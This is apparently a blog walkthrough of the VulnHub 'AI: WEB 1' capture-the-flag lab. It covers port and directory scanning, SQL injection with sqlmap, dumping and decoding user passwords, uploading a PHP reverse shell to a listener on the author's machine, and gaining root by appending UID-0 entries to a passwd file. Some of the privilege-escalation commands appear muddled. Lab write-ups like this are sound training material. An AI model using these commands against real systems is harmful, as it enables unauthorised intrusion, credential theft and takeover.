Pentesting: AI: WEB 1 | Privilege Escalation Attack | Python Reverse Shell | Vulnerabilities | SQL Injection | WriteUp | Walkthrough | VulnHub CTF | Flags

SHAMS UL MEHMOOD
9 min readMay 21, 2024

--

Hello, friends I’m Shams Ul Mehmood and this is my 4th article. This article is a walkthrough of all about AI: WEB: 1 Vulnhub Box. It includes some type of vulnerabilities like SQL Injection, Python Reverse Shell and User Privilege Escalation. You can find this Vulnhub box from here.

Steps:

  1. Getting the target machine IP address by Netdiscover utility
  2. Getting open port details by using the Nmap tool
  3. Enumerating HTTP default Port with Dirb / Gobuster / Nikto utilities
  4. Exploitation of Sql Injection Vulnerability
  5. Taking the Python reverse shell and user privilege escalation

Step-1:

📌️ In the first step of the scanning, I used the netdiscover -r commands to perform a Local Network Scan to find out the IP Address of the victim machine.

Command : sudo netdiscover -r 192.168.204.0/24

Step-2:

📌️ In the second step, after getting the victim machine’s IP address now I performed a Nmap scan to my victim. I used,

  • -sS : to scan running services.
  • -sV : to scan application version.
  • -p- : to scan all ports on victim machine.
  • -sC : to scan default script.

Command : sudo nmap -sS -p- -sV -sC 192.168.204.136

📌 ️This was an nmap scan of the network to find the IP address of the target machine. I found that the IP address was 192.168.204.136, and I found only a single port 80 which was open.

📌 Now I open the target machine ip address in browser.

Step-3:

📌️ In this step, I used the multiple tools like dirb, gobuster and nikto to enumerate interesting hidden files and directories on this target machine.

Command : sudo dirb http://192.168.204.136

Command : sudo gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://192.168.204.136

Command : nikto -h http://192.168.204.136/m3diNf0/

Command : nikto -h 192.168.204.136

📌 Then in browser search bar I append ‘/robots.txt’ file with victim machine ip address.

📌 Now you can see two parts in robots.txt which were disallow and user-agent.

📌 Now I one-by-one append robots.txt components with the target ip address in browser search bar.

Command : 192.168.204.136/*

Command : 192.168.204.136/m3diNf0/

Command : 192.168.204.136/se3reTdir777/uploads/

📌 But they return status codes errors like 404 (Not Found) and 403 (Forbidden).

📌 Then when I append ‘/m3diNf0/’ and ‘info.php’ with target machine ip address in browser search bar.

📌 When I append “/se3reTdir777" with the victim ip address in browser search bar then I found a form page.

Command : 192.168.204.136/se3reTdir777/

📌 Then I entered some type of user id’s then I get user basic info.

Step-4:

📌 In forth step, I found error-based sql injection vulnerability in this basic web form page by using inverted ‘ in text field.

📌 Then before to launch sql injection exploitation, first I capture the HTTP Requests by using BurpSuite. then save the captured requests in a file then I prefer to start exploitation by using SQLMAP.

📌 Then save the captured requests in attack_request.txt file on desktop then I prefer to start exploitation by using SQLMAP.

📌 Then use the following commands,

Command : ls ./Desktop/

Command : sudo sqlmap -r ./Desktop/attack_request.txt

Command : sudo sqlmap -r ./Desktop/attack_request.txt — dbs

Command : sudo sqlmap -r ./Desktop/attack_request.txt -D aiweb1 -T systerUser — columns

Command : sudo sqlmap -r ./Desktop/attack_request.txt -D aiweb1 -T user — columns

Command : sudo sqlmap -r ./Desktop/attack_request.txt -D aiweb1 -T user -C firstName, id, lastName — dump

📌 Now we decrypt the encrypted user passwords by using following commands:

Command : sudo echo RmFrZVVzZXJQYXNzdzByZA== | base64 -d

Command : sudo echo TXlFdmlsUGFzc19mOTA4c2RhZjlfc2FkZmFzZJBzYQ== | base64 -d

Command : sudo echo TjB0VGhpczBuZUFsczA= | base64 -d

Command : sudo sqlmap -r ./Desktop/attack_request.txt — dbs — os-pwn

📌 This task takes a few message prompts so I will try and walk you through it. I had to try a few times before I got it right myself.

📌 I went with the default php language option as we know the site is running php and opted in on the full path disclosure, to start.

📌 This is when things get a little tricky.

📌 With some trial and error, I eventually ended up going back to that info.php file we found earlier to discover a slightly unconventional root directory:

Command : /home/www/html/web1x443290o2sdf92213/

📌 The sqlmap ‘os-pwn’ option uploads a malicious payload, so I appended this strange root directory with our discovered uploads directory and saved it to a text file called ‘directory_listing’ and used it with option 3 in our next prompt.

📌 Before that, first I need to add given payload to directory_listing file in root directory of root user by using below commands.

Payload : /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads

Command : pwd

Command : cd /root

Command : nano /root/directory_listing

📌 Paste the above payload to directory_listing file.

📌 Then enter directory_listing file location.

📌 And just when it looked like we were about to get a reverse tcp connection..

📌 But it is failed!

📌 One of the best things about sqlmap, aside from it automating injection trial and error tasks for you, is it also shows you what it is doing.

Step-5:

📌 In 5th step, when we look back at the logs we see this.

📌 Which reveals a php script with an upload form.

URL : http://192.168.204.136/se3reTdir777/uploads/tmpuanbs.php

📌 Right this makes everything so much easier. We can turn to our favorite php-reverse-shell script, and be good to go.

📌 Now here you can see php-reverse-shell.php

📌 I change the above script to point to my local IP address, 192.168.204.143 and port 1010 for good luck.

📌 I saved the modified copy out as php_script.php.

📌 I then fire up a listener on my local machine by using following command.

Command : nc -lvp 1010

📌 Then browse the php_script.php file in Downloads directory by using upload form.

📌 After select, the php_script.php file with the help of upload form.

📌 The after upload, my file successfuly uploaded.

📌 Ok, now the moment of truth. With our listener still running in the background terminal, we navigate over to php_script.php.

📌 Wow, I have a shell.

📌 Then I was execute following command:

Command : whoami

📌 I used python reverse shell script for tty.

Command : python -c “import pty; pty.spawn(‘/bin/bash’)”

Command : whoami

Command : ls

Command : ls /etc/passwd

📌 Then I wanna show you usernames by using passwd file.

Command : cat /etc/passwd

📌 Here I want to add new multiple usernames to passwd file by using following commands.

Command : echo “root:x:0:0:root:/root:/bin/bash” > passwd

Command : echo “aiweb1pwn:x:0:0:root:/root:/bin/bash” > passwd

Command : echo “cybershark:x:0:0:root:/root:/bin/bash” > passwd

Command : cat passwd

📌 Then I was switched from www-data user to another user aiweb1pwn by using command.

Command : su aiweb1pwn

📌 Then Entered password for aiweb1pwn user.

Password : MyEvilPass_f908sdaf9_sadfasf0sa

Command : whoami

📌 Awesome, I have root-level access to my victim machine.

📌 Then I used the following command to find out required flag.

Command : cd /home/root/

Command : ls

Command : cat flag.txt

CTF Game Over : I am Root!

\( ゚ヮ゚)/🏆 🏆🎯🏅 🚀

📈⭐🧑‍🎤🎭💯

⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⠋⠁⠈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⠈⠙⣿⣿
⣿⣿⡄⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⠀⠀⢠⣿⣿
⣿⣿⣿⡀⠀⠀⢹⣿⣿⣿⣿⣿⠟⠉⠀⠀⠉⠻⣿⣿⣿⣿⣿⡏⠀⠀⢀⣿⣿⣿
⣿⣿⣿⣧⠀⠀⠀⢻⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⡟⠀⠀⠀⣼⣿⣿⣿
⣿⣿⣿⣿⡄⠀⠀⠈⢿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⡿⠁⠀⠀⢠⣿⣿⣿⣿
⣿⣿⣿⣿⣷⠀⠀⠀⠈⢿⣿⠀⠀⠀⠀⠀⠀⠀⠀⣿⡿⠁⠀⠀⠀⣾⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣧⠀⠀⠀⠈⢻⡆⠀⠀⠀⠀⠀⠀⢰⡟⠁⠀⠀⠀⣼⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣇⠀⠀⠀⢸⣿⣦⡀⠀⠀⢀⣴⣿⡇⠀⠀⠀⣸⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣦⠀⠀⠈⣇⠸⣿⠒⠒⣿⠇⣸⠁⠀⠀⣴⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⡀⠀⠀⣿⡀⢿⡄⢠⡿⢀⣿⠀⠀⢀⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠸⣧⠘⣷⣾⠃⣼⠇⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⢹⡶⠛⠛⢶⡏⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠘⣧⣀⣀⣼⠃⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣶⣶⣶⣶⣿⣿⣶⣶⣶⣶⣶⣿⣿⣿⣿⣿⣿⣿⣿⣿

--

--